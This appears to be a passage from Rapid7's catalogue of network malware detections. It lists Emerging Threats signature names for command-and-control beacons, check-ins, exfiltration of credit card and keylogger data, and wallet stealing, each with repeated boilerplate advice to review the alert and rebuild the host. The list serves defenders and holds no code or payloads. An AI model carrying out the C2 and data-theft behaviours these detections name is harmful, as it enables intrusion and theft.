This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ServHelper CnC Command (Whoami)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ServHelper CnC Inital Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ServHelper RAT CnC Domain Observed in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SFG Client Information POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Shafttt MySQL Bruteforce Bot CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Shamoon V3 CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke CnC Beacon 10

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 11

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 12

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 8

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 9

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke Fake 404 Response with Payload Location

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Adobe Connectivity check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Adobe Connectivity Check 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Adobe Connectivity Check 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Java Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Microsoft Connectivity check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Microsoft Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Receiving Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SharpPanda APT Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SharpPanda APT Maldoc Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Shifr Ransomware Malicious Domain in SNI Observed

Description
Copy link

Recommendation
Copy link

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE ShivaGood Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Shiz or Rohimafo Reporting Listening Socket to CnC Server

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Shiz/Rohimafo Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SHLAYER CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Shylock Module Data POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark CnC Activity (Beacon)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark CnC Activity (Download)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark CnC Activity (Upload)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark Uploading to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sidecopy APT Backdoor Related Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SideCopy Group Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sidewalk CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sidewinder Stage 2 VBS Downloader Reporting Successful Infection

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Silent Miner Changelog Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Simda.C Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Single char EXE direct download likely trojan (multiple families)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sinowal/sinonet/mebroot/Torpig infected host checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sinowal/sinonet/mebroot/Torpig infected host POSTing process list

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sisproc update

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE slock Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE SLOTHFULMEDIA RAT CnC (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Slugin.A PatchTimeCheck.dat Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smart Fortress FakeAV/Kryptik.ABNC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SmokeBot grab data plaintext

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SmokeLoader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smoke Loader Checkin r=gate

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smokeloader getgrab Command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smokeloader getload Command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smokeloader getproxy Command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smokeloader getsock Command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SmokeLoader - Init 0x

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SMS-Bomber Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SMSHoax Riskware checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smurf2 CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sn0wsLogger CnC Exfil M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sn0wsLogger CnC Exfil M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Snake Keylogger CnC Exfil via Telegram

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Snake rootkit usermode-centric encrypted command from server

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (ALIVE)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (CB)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (CD)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (EX)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (EXIT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (finito)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (LD)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (LIST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (LS)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (SIZE)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Socelars Stealer CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sofacy HTTP Request microsof-update.com

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sofacy Request Outbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Solarbot Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SolarBot Plugin Download ComputerInfo

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SolarBot Plugin Download MessageBox

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SolarBot Plugin Download WalletSteal

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SolarSys CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sorano Stealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (default)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (rhyno321)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (SBTCM)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (slayer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (VHIbot/1.0)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (Vulture)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (x09)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (xehanort321)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya Credit Card Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SoulSearcher Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Application Layer Protocol - T1071

ET MALWARE SoulSearcher Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Application Layer Protocol - T1071

ET MALWARE SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SPEAR CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE SPEAR CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Spoofed MSIE 7 User-Agent Likely Ponmocup

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Spoofed MSIE 8 User-Agent Likely Ponmocup

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Spora Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Spora Ransomware SSL Certificate Detected

Description
Copy link

Recommendation
Copy link

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE SpyAgent C&C Activity (Request)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SpyAgent C&C Activity (Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SpyEye C&C Check-in URI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SpyEye Checkin version 1.3.25 or later

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SQUIRRELWAFFLE Loader Activity (POST)

Description
Copy link

